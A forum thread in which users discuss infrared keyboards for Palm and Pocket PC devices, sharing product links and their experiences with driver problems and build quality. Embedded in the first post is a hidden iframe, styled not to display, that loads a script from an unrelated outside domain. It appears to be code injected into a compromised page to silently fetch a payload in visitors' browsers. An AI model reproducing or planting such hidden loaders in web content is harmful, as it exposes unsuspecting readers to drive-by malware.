IR keyboard for (almost) all PDA's

I found this from Sprint while i was bored. It looks pretty cool for those who dont have a hardware keyboard for their PDA. Also nice that you dont lose what you paid if you change from one device to another. Instead of it being custom for a specific device it uses the IR port found on almost all PDA's.

Check it out. http://www.pcsirkeyboard.com/

The same keyboard can be used with (most) Palm or Pocket PC devices.

This is just info on the product. It has not been released yet.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is another option for people interested in IR keyboards. It has received some good marks from other users.

Thanks Falconier and MobileRob these both look like great options for a wireless keyboard! I like the idea of it working with any PPC or palm device where you can mix and match your components. I didn't see on the Sprint one but the targus one is collapsible yet you can use it sitting in your lap. Sweet!

IR Keyboard severe flakiness

The IR Keyboard I purchased (same manufacturer as Sprint's, $30 at Radio Shack, BTW) has an OK feel, although not as good as the Palm folding keyboard by a long shot.

However, the flaky PalmOS drivers drive me insane, and let to my abandoning the product.

The sprint one is colapsable also, i dont know if it has a lock so you can just use it in your lap though.

I can see where it is best to try one in the store first or use your free trial period before committing yourself. Before I get a keyboard I will plan on trying as many brands as possible so as to find the one that feels best to me.
